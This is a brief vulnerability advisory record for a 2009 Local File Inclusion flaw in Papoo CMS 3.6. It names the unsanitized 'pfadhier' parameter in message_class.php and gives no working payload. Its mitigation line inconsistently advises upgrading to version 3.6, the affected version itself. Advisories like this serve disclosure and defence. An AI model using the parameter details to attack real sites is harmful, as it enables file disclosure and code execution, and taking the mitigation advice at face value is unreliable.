vendor: Papoo CMS
by: SirGod
CVSS: 8.8 HIGH
Local File Inclusion
CWE: 98
Product Name: Papoo CMS
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Papoo CMS 3.6 Local File Inclusion
Papoo CMS 3.6 is vulnerable to Local File Inclusion. The 'pfadhier' parameter in the 'message_class.php' script is not properly sanitized before being used to include files, so an attacker can include arbitrary files from local resources on the server. This can be exploited to view sensitive files on the server or to execute arbitrary code.
Mitigation:
Upgrade to the latest version of Papoo CMS 3.6